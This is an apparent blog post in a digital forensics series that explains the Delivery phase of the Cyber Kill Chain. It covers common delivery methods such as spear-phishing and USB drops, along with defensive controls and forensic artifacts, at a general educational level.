Welcome back to our ongoing Digital Forensics & Incident Response (DFIR) series. Last time, we explored Weaponization—where adversaries convert raw intel into potent payloads. Now, we move into the third phase of the Cyber Kill Chain: Delivery.

This is the pivotal moment when the attacker sends their crafted exploit into the wild—aimed directly at your environment. Whether it’s through email, a compromised website, or a rogue USB device, the goal is always the same: get the payload to the target.

🚚 What Happens During Delivery?

Delivery is the handoff—the transfer of the weaponized payload to the victim. Depending on the attacker’s strategy and reconnaissance data, they may use:

• Phishing emails with malicious attachments or links
• Malicious websites serving drive-by downloads
• Compromised third-party software updates
• Infected removable media (e.g., USB drives)
• Social engineering lures tied to current events or org-specific info

🎯 Why Delivery is a High-Risk Phase

Unlike Weaponization (which typically occurs offsite), Delivery happens inside your infrastructure—via your email gateway, web filters, or endpoints. If successful, it opens the door for exploitation and compromise.

🔍 Common Delivery Tactics & Tools

Method	Description
Spear-Phishing	Targeted emails laced with malicious links or documents tailored to recipients
Malvertising	Ads on legitimate sites redirect victims to exploit kits or fake downloads
Watering Hole Attacks	Compromising a website known to be frequented by targets
USB/Media Drops	Malicious code delivered via physical devices left in target locations

🛠️ Tools Defenders Can Use to Detect & Prevent Delivery

1. Email & Web Filtering

• Deploy secure email gateways (SEGs) with sandboxing capabilities
• Filter emails for known bad IPs, file hashes, and domain reputation
• Use DMARC, DKIM, and SPF to authenticate legitimate senders

2. Endpoint Monitoring

• Leverage Endpoint Detection and Response (EDR) tools to log payload execution
• Monitor for abnormal process launches like winword.exe starting powershell.exe
• Use behavior-based detections and alerting

3. Web Proxy & DNS Control

• Use DNS filtering to block known C2 domains
• Inspect outbound web traffic for anomalous requests
• Integrate threat intel feeds into web proxy solutions

4. User Training & Awareness

• Conduct regular phishing simulation campaigns
• Provide simple, clear reporting paths for suspicious emails or sites
• Train staff to recognize social engineering tactics

⚔️ DFIR Relevance: Why Delivery Matters

During forensic investigations, pinpointing the delivery vector is essential. Was the breach caused by a macro-laden invoice PDF? A click on a fake HR login page? Tracing delivery tells us how the payload breached defenses and guides containment strategies.

Artifacts such as email headers, browser history, file hashes, and proxy logs become critical in confirming how the payload entered and what systems it touched first.

🔁 Coming Next: Exploitation

Now that the payload is delivered, what happens when it’s opened? In the next part of our series, we’ll dive into Exploitation: how attackers trigger vulnerabilities to gain access—and how you can detect it early.

Until then, patch those filters, educate your users, and keep your defenses agile.